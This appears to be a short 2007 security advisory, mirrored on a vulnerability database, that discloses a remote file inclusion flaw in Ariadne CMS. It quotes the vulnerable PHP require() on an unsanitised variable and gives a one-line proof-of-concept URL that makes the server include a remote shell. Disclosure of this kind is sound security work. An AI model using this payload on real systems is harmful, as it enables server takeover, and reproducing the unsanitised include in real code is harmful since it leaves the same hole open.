Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17710
HistoryAug 07, 2007 - 12:00 a.m.

Ariadne CMS Remote File Inclusion

2007-08-0700:00:00
vulners.com
30

A R I A - S E C U R I T Y


Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/

Source Code:

<?php
require("./ariadne.inc");
require($ariadne."/configs/ariadne.phtml");

$PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];
?>
<html>
<head>
<script>
function LoadingDone() {
parent.LoadingDone();
}

PoC:
http://site.com/path/view.php?ariadne=SHELL?

Credits: Aria-Security Team
http://Aria-Security.net
http://outlaw.aria-security.info